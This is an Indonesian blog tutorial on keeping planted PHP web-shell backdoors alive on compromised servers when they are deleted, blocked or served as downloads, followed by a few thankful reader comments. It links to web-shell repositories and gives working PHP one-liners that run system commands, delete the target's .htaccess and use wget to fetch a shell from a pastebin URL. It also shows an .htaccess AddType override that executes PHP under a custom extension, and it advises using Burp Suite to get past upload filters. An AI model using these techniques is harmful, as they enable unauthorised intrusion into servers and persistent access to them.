Halo teman-teman , bagaimana kabarnya ? sehat kan ? , sebelum admin kasih tutorial pagi ini , admin mau minta maaf dulu karena sibuk kuliah jadi jarang update artikel hehe. Sesuai judul diatas kali ini kita akan belajar bagaimana cara mengatasi shell backdooryang terhapus(404 Not Found) , tidak dapat diakses(403 Forbidden), danterdownload dengan cara melakukan bypass pada shell tersebut.
Sebelum lebih jauh ke tutorialnya ,untuk kalian yang belum begitu paham tentang shell backdoor sini admin kasih tau dulu.Shell backdoor sendiri merupakan file yang berisi malicius code yang digunakan oleh seorang Attacker untuk masuk ke dalam sebuah server , dimana Attacker tersebut dapat mengedit , menghapus , mengunduh serta mengunggah apapun ke dalam server tersebut apabila mendapat akses root user.
Proses menanam shell backdor ke dalam sebuah server dapat dilakukan dengan banyak cara , pada proses peretasan(hacking) proses ini masuk kedalam fase Gainig Access. Saat ingin menanam sebuah shell backdoor sering kali ditemukan beberapa masalah terutama saat ingin mengakses nya, seperti yang sudah disebutkan diawal masalah yang sering terjadi antara lain muncul pesan 404 Nof Found (shell backdoor Terhapus otomatis oleh sistem), 403 Forbidden (Tidak dapat diakses ,disebabkan oleh filter yang digunakan untuk melakukan pada syntax tertentu yang dirasa berbahaya) , shell backdoor terdonwload (Mungkin disebabkan oleh file .htaccess). Nah bagaimana cara kita mengatasi masalah tersebut ? langsung saja ini dia.
Mengatasi Shell Backdoor Terhapus(404 Not Found) dan 403 Forbidden
1. Marijuana Shell
Kalian dapat mengatasi masalah ini dengan menggunakan Marijuana Shell Backdoor , untuk mendapatkan dan mengenal lebih jauh tentang marjiuana Shell ini silakan kunjungi https://github.com/0x5a455553/MARIJUANA
2. Tmp Shell
Selain menggunakan Marijuana Shell kalian juga dapat menggunakan Tmp shell , untuk mendapatkan tmp shell ini kalian bisa mengunjungi https://github.com/indoxploit-coders/tmp-shell . Nb.Untuk url shell yang ada didalam tmp shell dapat kalian ubah dengan shell kalian sendiri dalam format .txt
Mengatasi Shell Backdoor Terdownload
1. Bypass dengan menggunakan One Line Shell
- Buat sebuah file dengan nama gaptech.php
kemudian isi denga syntax berikut
<?php system("id") ?>
- Kemudian upload file tersebut ke server target ,selanjutnya kita harus mengahpus file .htaccess yang ada di server target agar kita bisa mengupload shell, caranya dengan syntax berikut ini
<?php system("rm .htaccess") ?>
- Terakhir untuk mengupload shell kita dapat
menggunakan syntax seperti dibawah ini
<?php system("wget https://pastebin.com/raw/XB5ahTm4 -O gaptech.php") ?>
2. Bypass dengan menggunakan Override .htaccess
- Buat file .htaccess dan tuliskan syntax berikut
ini
AddType application/x-httpd-php .gaptech
- Kemudian Upload file .htaccess tadi ke dalam server , jika format .htaccess tidak diijinkan coba kalian tamper / bypassekstensi dengan burpsuite
- Terakhir Upload Marijuana shell dengan nama marijuana.gaptech
Itu dia beberapa cara untuk melakukan bypass terhadap shell yang terhapus , forbidden dan terdownload , jika kalian mengalami kesulitan silakan tulis dikolom komentar dibawah. Jangan lupa bantu share artikel ini ke teman teman kalian agar teman kalian tau apa yang kalian tau. Oke sekian , terimakasih see you next time.
3 Komentar
mantapppp minnn
BalasHapusMantap
BalasHapusMakasih min
BalasHapus